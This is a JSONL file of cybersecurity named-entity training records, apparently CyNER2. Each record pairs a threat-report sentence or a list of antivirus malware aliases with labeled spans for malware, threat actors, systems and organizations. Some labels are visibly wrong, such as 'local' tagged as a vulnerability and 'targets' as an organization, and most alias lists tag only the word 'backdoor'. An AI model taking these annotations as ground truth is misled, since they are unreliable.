{"text": "Families like Poweliks, which abuse Microsoft's PowerShell, have emerged in recent years and have garnered extensive attention due to their ability to compromise a system while leaving little or no trace of their presence to traditional forensic techniques.", "spans": {"MALWARE: Families": [[0, 8]], "MALWARE: Poweliks,": [[14, 23]], "VULNERABILITY: abuse Microsoft's PowerShell,": [[30, 59]], "VULNERABILITY: compromise": [[151, 161]], "SYSTEM: system": [[164, 170]]}, "info": {"id": "cyner2_train_003593", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.VBS.Shutdown TrojanDownloader:Win32/Tembatch.A Trojan.Jacard.D636D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003594", "source": "cyner2_train"}}
{"text": "The malicious activity includes beaconing to actor-controlled infrastructure, deployment of second-stage payloads, and, in a small number of cases, hands-on-keyboard activity.", "spans": {"SYSTEM: actor-controlled infrastructure,": [[45, 77]], "MALWARE: payloads,": [[105, 114]]}, "info": {"id": "cyner2_train_003595", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Trojan.Proxy.Small.E Trojan-Proxy/W32.Small.4096.C TrojanProxy.Small Trojan/Proxy.Small.e Win32.Trojan.WisdomEyes.16070401.9500.9933 Win32/Slarp.B BKDR_SALAR.A Win.Trojan.Proxy-3663 Trojan.Proxy.Small.E Trojan-Proxy.Win32.Small.e Trojan.Proxy.Small.E Trojan.Win32.Small.dosc Troj.Proxy.W32.Small.e!c Win32.Trojan-proxy.Small.Ozsg Trojan.Proxy.Small.E Trojan.Proxy.Small.E Trojan.Proxy.1698 Trojan.Small.Win32.2849 BKDR_SALAR.A W32/Risk.RVLO-8598 TrojanProxy.Small.aeu Win32.Troj.Small.e.kcloud Trojan.Proxy.Small.E Trojan-Proxy.Win32.Small.e TrojanProxy:Win32/Small.E Trojan.Proxy.Small.E BScope.Trojan.Jackz.a Win32/TrojanProxy.Small.NEQ Trojan.PR.Small!jIc3Mh2dhO0 W32/Bdoor.A!tr.bdr Bck/Salar.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003598", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W97M/Downloader.cew Trojan.Phisherly TROJ_PHISHERLY.ZQEJ-A TROJ_PHISHERLY.ZQEJ-A W97M/Downloader.cew ZIP/Trojan.YBQC-0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003600", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DumtoxXAX.Trojan Worm.Win32.VB!O Trojan.Comisproc.AZ3 Trojan.VB.Win32.56251 Trojan/VB.peu Trojan.Heur.EE2DE0 WORM_VOBFUS.NER Win32.Trojan.VB.je WORM_VOBFUS.NER Worm.Win32.VB.fer Trojan.Win32.VB.epyowu BehavesLike.Win32.VBObfus.cz Worm.Win32.VB Worm/VB.pcc Worm/Win32.VB.fer Worm.Win32.A.VB.176128.AR Worm.Win32.VB.fer Worm/Win32.AutoRun.R49416 W32/Autorun.worm.aacy TScope.Trojan.VB Win32/VB.PEU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003601", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Racvacs.AA2 Trojan.Cosmu.Win32.3454 Trojan/Scar.atyl Win32.Trojan.IRCBot.b Win32/IRCBot.JZK TROJ_PAM_000001074B.T3 Trojan.Win32.MLW.stwkl Troj.W32.Cosmu.ldLk Worm.Win32.Autorun.lbe Win32.HLLW.Autoruner1.11201 BehavesLike.Win32.Downloader.lm Trojan/Scar.bqi Worm:Win32/Ircbot.D Trojan/Win32.Unknown Win32.Troj.Undef.kcloud Worm:Win32/IRCbot.D Worm/Win32.AutoRun.R2912 W32/Autorun.worm.bbx BScope.Trojan-Spy.Zbot Trojan.Win32.Cosmu", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003602", "source": "cyner2_train"}}
{"text": "The owners of Trojans such as Leech, Ztorg, Gorpo as well as the new malware family Trojan.AndroidOS.Iop are working together.", "spans": {"THREAT_ACTOR: The owners": [[0, 10]], "MALWARE: Trojans": [[14, 21]], "MALWARE: Leech, Ztorg, Gorpo": [[30, 49]], "MALWARE: malware family Trojan.AndroidOS.Iop": [[69, 104]]}, "info": {"id": "cyner2_train_003607", "source": "cyner2_train"}}
{"text": "However, there is much information confused together, as if an entirely new IoT bot is spreading to and from Windows devices.", "spans": {"MALWARE: IoT bot": [[76, 83]], "SYSTEM: Windows devices.": [[109, 125]]}, "info": {"id": "cyner2_train_003608", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Nadostarch Trojan:Win32/Nadostarch.A Trojan.Win32.Nadostarch", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003609", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.HLLW.Autoruner.6669 Worm:Win32/Mofeir.P", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003612", "source": "cyner2_train"}}
{"text": "To make the fake report appear even more scary, the malware displays your IP address and a picture of you.", "spans": {"MALWARE: malware": [[52, 59]]}, "info": {"id": "cyner2_train_003614", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Email-Worm.Zhelatin.pk W32/Zhelatin.pk Trojan.Win32.Zhelatin.mqtc Trojan.Peacomm Tibs.BFZS Win32/Sintun.AV TROJ_NUWAR.UP Trojan.Zhelatin Email-Worm.Win32.Zhelatin.pk I-Worm.Win32.Zhelatin.142336 EmailWorm.Win32.Zhelatin.pk0 Trojan.Spambot.2386 TROJ_NUWAR.UP Worm.Zhelatin.pk.kcloud Backdoor:Win32/Nuwar.A Worm/Win32.Zhelatin BScope.Zhelatin.con Trojan.Peacomm!rem Virus.Win32.Zhelatin W32/Tibs.G@mm I-Worm/Nuwar.N Trj/Spammer.AFG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003616", "source": "cyner2_train"}}
{"text": "Cerber has previously been seen distributed via exploit kits and over e-mail using DOC files with macros.", "spans": {"MALWARE: Cerber": [[0, 6]], "MALWARE: exploit kits": [[48, 60]]}, "info": {"id": "cyner2_train_003622", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.4252 Backdoor.Hupigon.148473 Backdoor.Hupigon.148473 Backdoor.Hupigon.D243F9 Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Hupigon.148473 Backdoor.Hupigon.148473 Backdoor.Hupigon.148473 BackDoor.Pigeon1.3852 Win32.Hack.Huigezi.n.kcloud Backdoor:Win32/Tenpeq.C Backdoor.Hupigon.148473 MalwareScope.Trojan-PSW.Game.16 Trojan.Hupigon!iPBnzuR7b40 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003623", "source": "cyner2_train"}}
{"text": "Since then, several examples of malware created by Animal Farm have been found and publicly documented, in particular:", "spans": {"MALWARE: malware": [[32, 39]], "THREAT_ACTOR: Animal Farm": [[51, 62]]}, "info": {"id": "cyner2_train_003624", "source": "cyner2_train"}}
{"text": "He most probably did so to restore his reputation on a number of hacker forums: earlier, he had been promoting his development so aggressively and behaving so erratically that he was eventually suspected of being a scammer.", "spans": {"THREAT_ACTOR: number of hacker forums:": [[55, 79]], "THREAT_ACTOR: scammer.": [[215, 223]]}, "info": {"id": "cyner2_train_003626", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Win32.Ngrbot!O Worm.Ngrbot Trojan.Zbot.Win32.51206 Trojan/Spy.Zbot.dcar Win32.Trojan.WisdomEyes.16070401.9500.9985 W32/Trojan.IPQV-8835 Win.Trojan.Zbot-52317 Worm.Win32.Ngrbot.kie Troj.W32.Qhost.lkwM BehavesLike.Win32.ZBot.dc Trojan-Dropper.Win32.VB Worm/Win32.Ngrbot Worm.Win32.Ngrbot.kie Worm/Win32.Ngrbot.R62747 Worm.Ngrbot Trojan.Zbot TrojanSpy.Zbot!FbLT0Cb2klI W32/VBInjector.W!tr Win32/Trojan.BO.255", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003630", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Downloader.Adload.tml Trojan.Buzy.D8FA TSPY_DOWNLOADER_CD1002E2.RDXN Win32.Trojan.WisdomEyes.16070401.9500.9973 TROJ_PAM_0000010534.T3 Win.Trojan.Adload-3700 Trojan.Win32.Snojan.ccxx Trojan.Win32.Adload.cpqwy TrojWare.Win32.TrojanDownloader.Adload.tmm Trojan.DownLoader1.22512 BehavesLike.Win32.Backdoor.rc Trojan-Downloader.Win32.Adload TrojanDownloader.Adload.naf TrojanDownloader:Win32/Neup.A Trojan.Win32.Snojan.ccxx Downloader/Win32.Adload.R11798 PUP.Optional.Funshion Win32.Trojan.Adclicker.Sxoq Trojan.DL.Adload.MGR Win32/Trojan.56c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003635", "source": "cyner2_train"}}
{"text": "Several months ago, we discovered and exposed RETADUP malware in Israeli hospitals.", "spans": {"MALWARE: RETADUP malware": [[46, 61]], "ORGANIZATION: Israeli hospitals.": [[65, 83]]}, "info": {"id": "cyner2_train_003637", "source": "cyner2_train"}}
{"text": "This malicious program attacks only Raspberry Pi minicomputers.", "spans": {"MALWARE: malicious": [[5, 14]], "SYSTEM: Raspberry Pi minicomputers.": [[36, 63]]}, "info": {"id": "cyner2_train_003639", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Clicker.Win32.VB!O Win32/Adclicker.DSU Trojan-Clicker.Win32.VB.isz Trojan.Win32.VB.bcvse Trojan.Click1.25507 BehavesLike.Win32.Dropper.qt Trojan.Crypt TrojanClicker.VB.kho Trojan.Heur.ZGY.5 W32.W.Hawawi.lmFq Trojan-Clicker.Win32.VB.isz TrojanClicker:Win32/Refpron.A Trojan/Win32.Xema.R155513", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003640", "source": "cyner2_train"}}
{"text": "In some samples analyzed by CTU researchers, the attachment was an obfuscated VBScript .vbs file that downloads and installs AdWind, or the email message just included a link to download and install the malware.", "spans": {"ORGANIZATION: CTU researchers,": [[28, 44]], "MALWARE: AdWind,": [[125, 132]]}, "info": {"id": "cyner2_train_003642", "source": "cyner2_train"}}
{"text": "It's these same teens that are causing a surge in mobile ransomware in the Chinese underground market.", "spans": {"THREAT_ACTOR: teens": [[16, 21]], "SYSTEM: mobile": [[50, 56]], "MALWARE: ransomware": [[57, 67]], "THREAT_ACTOR: Chinese underground market.": [[75, 102]]}, "info": {"id": "cyner2_train_003643", "source": "cyner2_train"}}
{"text": "In 2017 and 2018, ITG03 actors stole over $534 million from cryptocurrency exchange attacks, according to security firm Group IB.", "spans": {"THREAT_ACTOR: ITG03 actors": [[18, 30]], "ORGANIZATION: security firm Group IB.": [[106, 129]]}, "info": {"id": "cyner2_train_003647", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Hacktool.Bendor.C Trojan/W32.HackTool.20480.O Hacktool.Bendor Trojan.Hacktool.Bendor.C Tool.Bendor.Win32.1 Trojan/Hacktool.Bendor Trojan.Hacktool.Bendor.C BKDR_BANDOR.A Win32.Trojan.WisdomEyes.16070401.9500.9602 W32/Trojan.VSQ BKDR_BANDOR.A Trojan.Hacktool.Bendor.C HackTool.Win32.Bendor Trojan.Hacktool.Bendor.C Riskware.Win32.Bendor.hrie HackTool.Bendor.20480 HackTool.W32.Bendor!c Trojan.Hacktool.Bendor.C TrojWare.Win32.HackTool.Bendor.A Trojan.Hacktool.Bendor.C W32/Trojan.ULWX-3793 HackTool/Bendor.a W32.Hack.Tool HackTool/Win32.Bendor HackTool.Win32.Bendor Trj/Legmir.AJQ Win32/HackTool.Bendor.A Win32.Hacktool.Bendor.Lkdj HackTool.Bendor!+3jB7Bxnt10 Malware_fam.gw Win32/Trojan.Hacktool.5e9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003650", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Graftor.eruomq Trojan.Proxy2.754 Trojan.Proxy.1 Trj/GdSda.A Win32/Trojan.2c0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003651", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9723 Trojan.MSIL.Krypt.2 Trojan:MSIL/Remdobe.C TrojanDropper.FrauDrop Trj/CI.A Trojan.Win32.Jorik Win32/Trojan.7c5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003653", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Virus02 Virus.Win32.Sality!O Win32.Trojan.WisdomEyes.16070401.9500.9876 Trojan.DownLoader.22765 BehavesLike.Win32.PWSZbot.mc Backdoor.Win32.Rbot TrojanDownloader:Win32/Wudoo.A Win32/Adware.Toolbar.Baidu", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003654", "source": "cyner2_train"}}
{"text": "This remote access toolkit has been publicly examined multiple times by the threat intelligence community.", "spans": {"MALWARE: remote access toolkit": [[5, 26]], "ORGANIZATION: threat intelligence community.": [[76, 106]]}, "info": {"id": "cyner2_train_003658", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MulDrop5.13033 HackTool.MSIL.ccp W32.Hack.Tool HackTool.Win32.AutoKMS Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003659", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.BaragoneE.Trojan Trojan.Win32.Cosmu!O Trojan.Cosmu.Win32.14181 TROJ_COSMU.SMJ0 Win32/Cosmu.OP TROJ_COSMU.SMJ0 Win.Trojan.Mybot-8550 Trojan.Win32.Bot.ercyne TrojWare.Win32.Phishbank.DA Trojan.Click1.57939 BehavesLike.Win32.Downloader.ch Trojan/Win32.Cosmu.awlb Trojan:Win32/Phishbank.A W32.W.Mydoom.kZJ8 TScope.Malware-Cryptor.SB Trojan.Win32.Sisron Trojan.Win32.Phishbank.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003661", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Malware03 AdWare.W32.Gamevance.m6Qo Trojan/Downloader.Stantinko.n Win32.Trojan.Xpack.a Win32.Trojan-Downloader.Stantinko.A TrojWare.Win32.TrojanDownloader.Stantinko.D BehavesLike.Win32.Downloader.ch Trojan.Graftor Trojan:Win32/Fiya.E Win32/TrojanDownloader.Stantinko.N W32/Stantinko.S!tr.dldr Win32/Trojan.Stantinko.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003662", "source": "cyner2_train"}}
{"text": "The only difference is the malware payload being dropped, which is current and had very low detection on VirusTotal.", "spans": {"MALWARE: malware payload": [[27, 42]], "ORGANIZATION: VirusTotal.": [[105, 116]]}, "info": {"id": "cyner2_train_003663", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.VBMailSpam.B Trojan/W32.Flooder.577024.B Trojan/Delf.a TROJ_SPAMMER.A W32/Worm.FSFK-2238 Hacktool.Spammer Win32/Spadelf.C TROJ_SPAMMER.A Trojan.VBMailSpam.B Email-Flooder.Win32.Delf.a Trojan.VBMailSpam.B Trojan.Win32.Delf.ifpg Spyware.Email-Flooder.Delf.577024 Email-Flooder.W32.Delf.a!c Trojan.VBMailSpam.B TrojWare.Win32.Flooder.MailSpam.A Trojan.VBMailSpam.B Flooder.Mailbomb.6 Tool.Delf.Win32.442 W32/Worm.FVM Flooder.MailSpam.Delvs TR/VBMailSpam.B.1 HackTool[Flooder]/Win32.Delf Win32.Hack.Delf.a.kcloud Trojan.VBMailSpam.B Email-Flooder.Win32.Delf.a Spammer:Win32/Delf.A Trojan.VBMailSpam.B EmailFlooder.Delf Win32/Flooder.MailSpam.Delf.A Flooder.Delf!YEHm2HeU39s Trojan.Win32.Flooder Malware_fam.gw Win32/Trojan.fd6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003665", "source": "cyner2_train"}}
{"text": "This includes detailed technical analysis of the Prikormka malware family and its spreading mechanisms, and a description of the most noteworthy attack campaigns.", "spans": {"MALWARE: Prikormka malware family": [[49, 73]], "THREAT_ACTOR: attack campaigns.": [[145, 162]]}, "info": {"id": "cyner2_train_003666", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HackTool.Win32!O Win32.Trojan.WisdomEyes.16070401.9500.9867 Win.Tool.Hotfreezer-2 Trojan.Win32.Refroso.csjta TrojWare.Win32.HackTool.Homac Tool.Homac BehavesLike.Win32.Mydoom.pz Trojan/Refroso.ulh Trojan[Backdoor]/Win32.Shark HackTool:Win32/Homac.A HackTool.Homac Win32/HackTool.Homac Hacktool.Homac.A HackTool.Win32.Homac", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003667", "source": "cyner2_train"}}
{"text": "Hancitor is a popular dropper used in phishing campaigns.", "spans": {"MALWARE: Hancitor": [[0, 8]], "MALWARE: dropper": [[22, 29]], "THREAT_ACTOR: phishing campaigns.": [[38, 57]]}, "info": {"id": "cyner2_train_003669", "source": "cyner2_train"}}
{"text": "A reputable, high-profile ad network provides traffers with access to higher-quality traffic, and the more reputable an ad network appears, the easier it is for traffers to reach this target traffic.", "spans": {"ORGANIZATION: high-profile ad network": [[13, 36]], "ORGANIZATION: ad network": [[120, 130]]}, "info": {"id": "cyner2_train_003670", "source": "cyner2_train"}}
{"text": "In other cases, spear phish directs users to websites that would otherwise be trusted but actually have been compromised by threat actors seeking greater access to fulfill their actions and objectives.", "spans": {"THREAT_ACTOR: threat actors": [[124, 137]]}, "info": {"id": "cyner2_train_003671", "source": "cyner2_train"}}
{"text": "Cybercriminals are using local brand names such as local ISP providers and legitimate looking addresses to fool users into downloading malware that can steal information by monitoring browsers, file transfer protocol FTP clients, and mail clients.", "spans": {"THREAT_ACTOR: Cybercriminals": [[0, 14]], "VULNERABILITY: local": [[25, 30]], "MALWARE: malware": [[135, 142]]}, "info": {"id": "cyner2_train_003672", "source": "cyner2_train"}}
{"text": "Unit 42 has been tracking a new Remote Access Trojan RAT being sold for $40 USD since April 2016, known as Orcus", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "MALWARE: Remote Access Trojan RAT": [[32, 56]], "MALWARE: Orcus": [[107, 112]]}, "info": {"id": "cyner2_train_003673", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Scar.15360.P Trojan.Win32.Scar!O Win32.Trojan.WisdomEyes.16070401.9500.9973 W32/Trojan.WBMR-2019 Win.Trojan.Merong-1 Trojan.Win32.Scar.dcrm Trojan.Win32.Scar.chxtv Trojan.Win32.A.Scar.15360 Troj.W32.Scar.dcrm!c Trojan.DownLoader5.8015 Trojan.Scar.Win32.48783 Trojan.Win32.Scar W32/Trojan3.YUH W32.Trojan.Scar Trojan/Win32.Scar Trojan.Win32.Scar.dcrm Trojan:Win32/Sluegot.A Trojan/Win32.Scar.R81257 Trojan.Scar Win32.Trojan.Scar.bove Trojan.Scar!69cHD7mX3A8 W32/Scar.DCM!tr.dldr Win32/Trojan.17a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003677", "source": "cyner2_train"}}
{"text": "Indicators related to the CryptFile2 ransomware", "spans": {"MALWARE: CryptFile2 ransomware": [[26, 47]]}, "info": {"id": "cyner2_train_003680", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Proxy/W32.Thunker.14848.B Trojan/Proxy.Thunker.a TROJ_THUNKER.A Win32.Trojan.WisdomEyes.16070401.9500.9995 W32/Espy.OUZC-2697 Backdoor.Thunker Win32/Knooth.C TROJ_THUNKER.A Trojan-Proxy.Win32.Thunker.a Trojan.Win32.Thunker.gtlj Trojan.Win32.Proxy.14848.F Troj.Proxy.W32.Thunker.a!c TrojWare.Win32.TrojanProxy.Thunker.B Trojan.Thunker Trojan.Thunker.Win32.5 Trojan-Proxy.Win32.Thunker W32/Espy.A TrojanProxy.Thunker.b TR/Thunker.DLL Trojan[Proxy]/Win32.Thunker Win32.Troj.Thunker.a.kcloud Trojan-Proxy.Win32.Thunker.a Win32/TrojanProxy.Thunker.B Win32.Trojan-proxy.Thunker.Ajlv Trojan.Thunker.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003683", "source": "cyner2_train"}}
{"text": "Qianxin dissects a new malicious campaign by the SideCopy APT group.", "spans": {"ORGANIZATION: Qianxin": [[0, 7]], "THREAT_ACTOR: new malicious campaign": [[19, 41]], "THREAT_ACTOR: the SideCopy APT group.": [[45, 68]]}, "info": {"id": "cyner2_train_003684", "source": "cyner2_train"}}
{"text": "Suspect You ’ re Infected ? The following SMS message can be used to kill the sample analyzed in this research and all other variants that use the same private key : HrLbpr3x/htAVnAgYepBuH2xmFDb68TYTt7FwGn0ddGlQJv/hqsctL57ocFU0Oz3L+uhLcOGG7GVBAfHKL1TBQ== Sending this SMS will trigger TrickMo ’ s kill switch by sending the string “ 4 ” encrypted with the generated RSA public key and base64 encoded .", "spans": {"MALWARE: TrickMo": [[285, 292]]}, "info": {"id": "cyner2_train_003686", "source": "cyner2_train"}}
{"text": "Email is one of the favorite methods used by attackers to infect systems.", "spans": {"THREAT_ACTOR: attackers": [[45, 54]], "SYSTEM: infect systems.": [[58, 73]]}, "info": {"id": "cyner2_train_003689", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Strictor.D22A4D W32/Trojan.ZZSK-0144 Win.Exploit.Fnstenv_mov-1 BehavesLike.Win32.Multiplug.wc Backdoor/Win32.Wingbird.R209335 W32/Injector.DNRG!tr Trj/GdSda.A Win32/Trojan.Spy.c28", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003691", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.ForShare.WmiBit Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Trojan.DownLoader24.53357 Trojan/Win32.PcClient.R191990 Win32/RootKit.Rootkit.7e5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003692", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Win32.VB!O Worm.VB Worm.VB.Win32.2956 W32/VB.bhj Win32.Trojan.WisdomEyes.16070401.9500.9998 BKDR_PSVR_0000001.TOMA Win.Worm.VB-71919 Worm.Win32.VB.bhj Trojan.Win32.VB.dxohtw BackDoor.Poison.686 BKDR_PSVR_0000001.TOMA Trojan-Dropper.Vb Trojan.Razy.D3A7C4 Worm.Win32.A.VB.168516 Worm.Win32.VB.bhj Worm/Win32.VB.C142786 W32/VBKrypt.C!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003693", "source": "cyner2_train"}}
{"text": "The domain was registered on August 4, 2015, under a presumably false name, and we suspect that the attack started on the same day.", "spans": {}, "info": {"id": "cyner2_train_003694", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.TrosdanpomLTAA.Trojan Backdoor.Laserv.B Backdoor.Win32.Laserv!O Backdoor.Laserv.A4 Backdoor/Laserv.b W32/Backdoor.NWE Backdoor.Lassrv.B Win32/Lassrv.B BKDR_LASSRV.B Win.Trojan.Laserv-1 Backdoor.Laserv.B Backdoor.Win32.Laserv.b Backdoor.Laserv.B Trojan.Win32.Laserv.csyvps Trojan.Win32.Equation.132608 Backdoor.Laserv.B Backdoor.Laserv.B Backdoor.Laserv.Win32.8 BKDR_LASSRV.B BehavesLike.Win32.Downloader.ch W32/Backdoor.ZYMS-3992 BDS/Laserv.B.2 Trojan[Backdoor]/Win32.Laserv Backdoor.Laserv.B Backdoor.W32.Laserv!c Backdoor.Win32.Laserv.b Backdoor:Win32/Salsnit.A Win-Trojan/Equation.132623 Backdoor.Laserv.B Trojan.EquationLaser Win32.Backdoor.Laserv.Dvzs Backdoor.Laserv!QkthHIoGFGU Backdoor.Win32.Laserv W32/Laserv.C!tr Win32/Backdoor.21d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003695", "source": "cyner2_train"}}
{"text": "This group has evolved a lot in sophistication and evasion techniques to defeat detection by security products.", "spans": {}, "info": {"id": "cyner2_train_003696", "source": "cyner2_train"}}
{"text": "The choice of a lesser known currency with a good exchange rate allows the attackers to rapidly gain money while the sophisticated use of safeguards makes it resilient to most disruption attempts, potentially leaving victims infected for years.", "spans": {}, "info": {"id": "cyner2_train_003697", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dembr Trojan.MBR.Killer Trojan/KillDisk.nas TROJ_KILLMBR.SM Win32.Trojan.WisdomEyes.16070401.9500.9964 W32/Jokra.DWCJ-4354 Trojan.Jokra Win32/Tnega.ASFM TROJ_KILLMBR.SM Trojan.Win32.EraseMBR.b Trojan.Win32.EraseMBR.cqzdgw Trojan.Win32.S.KillMBR.24576 Troj.W32.EraseMBR.b!c Trojan.KillFiles.10563 Trojan.EraseMBR.Win32.4 W32/Jokra.A Trojan/EraseMBR.h TR/KillMBR.Y.2 Trojan/Win32.EraseMBR Trojan.Win32.EraseMBR.b Trojan:Win32/Dembr.A Trojan.KillDisk.MBR OScope.Trojan.KillMBR.2113 Trojan.KillDisk.NAS Win32/KillDisk.NAS Trojan.Win32.DataWiper.b Trojan.EraseMBR!+80n0qBNT48 Trojan.Win32.EraseMBR W32/Kast.A!tr Win32/Trojan.c81", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003700", "source": "cyner2_train"}}
{"text": "What makes the Turla group special is not just the complexity of its tools, which include the Uroboros rootkit, aka Snake as well as mechanisms designed to bypass air gaps through multi-stage proxy networks inside LANs, but the exquisite satellite-based C C mechanism used in the latter stages of the attack.", "spans": {"THREAT_ACTOR: group": [[21, 26]], "MALWARE: tools,": [[69, 75]], "MALWARE: Uroboros rootkit,": [[94, 111]], "MALWARE: Snake": [[116, 121]], "SYSTEM: LANs,": [[214, 219]]}, "info": {"id": "cyner2_train_003701", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Win32.Trojan.WisdomEyes.16070401.9500.9647 Heur.Corrupt.PE Trojan.MulDrop3.4445 TrojanDownloader:Win32/Cordmix.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003702", "source": "cyner2_train"}}
{"text": "To achieve persistence, the malware creates a Run key Registry entry on the system.", "spans": {"MALWARE: malware": [[28, 35]], "SYSTEM: system.": [[76, 83]]}, "info": {"id": "cyner2_train_003705", "source": "cyner2_train"}}
{"text": "This industry initiative was created to share information and potentially disrupt the infrastructure and tools from an actor named the Lazarus Group.", "spans": {"ORGANIZATION: industry": [[5, 13]], "SYSTEM: infrastructure": [[86, 100]], "MALWARE: tools": [[105, 110]], "THREAT_ACTOR: actor": [[119, 124]], "THREAT_ACTOR: Lazarus Group.": [[135, 149]]}, "info": {"id": "cyner2_train_003707", "source": "cyner2_train"}}
{"text": "Primarily targets South Korea.", "spans": {"ORGANIZATION: targets": [[10, 17]]}, "info": {"id": "cyner2_train_003709", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Inject.79360.B Trojan.Jinto Trojan/Inject.nzs Trojan.Heur.TP.EDF4BE Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan2.IJVQ TROJ_INJECT.AQT Trojan.Win32.Inject.79360 Troj.W32.Inject.nzs!c TrojWare.Win32.Inject.nzs Win32.HLLW.Recycler.8 Trojan.Inject.Win32.2004 TROJ_INJECT.AQT BehavesLike.Win32.PWSZbot.lh W32/Trojan.PLGK-4123 Trojan/Inject.dyx Win32.Troj.Inject.kcloud Trojan:WinNT/Jinto.A BScope.P2P-Worm.Palevo Trojan.Win32.Tdss Win32/Trojan.c68", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003710", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.NSIS.FraudLoad.hd BackDoor.RMS.111 BehavesLike.Win32.Dropper.vc W32/Trojan.KGYI-2902 TR/RedCap.ntnqc Backdoor:Win32/Kitpolap.A Trojan-Downloader.NSIS.FraudLoad.hd Trojan/Win32.Downloader.C2123311 Trj/CI.A NSIS/Radmin.B Win32.Trojan.Ratenjay.Umsg Riskware.RemoteAdmin!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003712", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Malware00 Backdoor.Sharat TROJ_TROXEN.CHU Win32.Trojan.WisdomEyes.16070401.9500.9995 TROJ_TROXEN.CHU Win.Trojan.Downbot-3 Trojan.DownLoader5.18587 Trojan.Heur.RP.EA89AF Downloader/Win32.Small.R1708 Win32/Sharat.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003717", "source": "cyner2_train"}}
{"text": "Talos has found a new SPAM campaign that is using multiple layers of obfuscation to attempt to evade detection.", "spans": {"ORGANIZATION: Talos": [[0, 5]], "THREAT_ACTOR: SPAM campaign": [[22, 35]]}, "info": {"id": "cyner2_train_003719", "source": "cyner2_train"}}
